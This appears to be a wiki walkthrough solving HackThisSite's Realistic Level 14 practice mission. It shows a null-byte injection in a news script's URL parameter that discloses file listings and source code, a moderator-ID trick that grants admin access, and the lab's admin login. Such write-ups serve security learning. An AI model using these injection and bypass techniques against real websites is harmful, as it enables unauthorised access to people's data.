Hackthissite/Realistic/Level14

From aldeid
Jump to navigation Jump to search

Information

Real14.png
  • Level: Realistic::14 (Yuppers Internet Solutions)
  • URL: http://www.hackthissite.org/missions/realistic/14/
  • Difficulty : Star-1.pngStar-1.pngStar-1.pngStar-1.pngStar-0.png
  • Exercise: An internet start-up is rumoured to be selling user data and usage habits to advertisers while they claim the opposite. Hack in and get some proof.
  • Message: You've probably heard of Yuppers Internet Solutions before. They started in 1997 and are now one of the top websites on the net. I was an intern at Yuppers for a time, but quit when I learned that the admins were selling user data and usage habits to advertisers while saying the opposite. Unfortunately, I couldn't get out of the building with any proof and don't have any high-level access. I do know, however, that much of the coding on their site was done by amateurs and is probably insecure. Can you hack in and get some proof?

Solution

Step 1: Find an admin account

Find pages

To find an acess, we try many injections in the form fields (GET method is easier). We can see that the news reader (news.cgi) accepts one parameter named "story". By injecting a dot and null byte (.%00), we can see this:

Hackthissite-14-1.png

Once ordered, here is the information we get:

Text files
Web pages
Cgi scripts
Htaccess
Javascripts
Directories
Images

In addition, source code shows additional information:

Hackthissite-14-2.png

Read source code of Perl scripts

We are going to use the discovered vulnerability in the news reader (news.cgi?story=) to read moderator.cgi.

Point to http://www.hackthissite.org/missions/realistic/14/news.cgi?story=moderator.cgi%00. You should see this:

Hackthissite-14-3.png

By scrolling down, we see this test:

Hackthissite-14-4.png

If the function "isadmin" is not protected, the string "isadmin" should enable to grant an admin access.

Go to that page:

http://www.hackthissite.org/missions/realistic/14/moderator.cgi

And enter "isadmin" as moderator id:

Hackthissite-14-5.png

In the following screen enter "*"

Hackthissite-14-6.png

You should now access this screen:

Hackthissite-14-7.png

Login as admin

From the welcome page, access the authentication form:

http://www.hackthissite.org/missions/realistic/14/login.html

And log in using following credentials:

  • Username: webguy
  • Password: reallyreallylongpasswordthatisveryveryveryhardtoguessorcrack

That works! Mission completed

Comments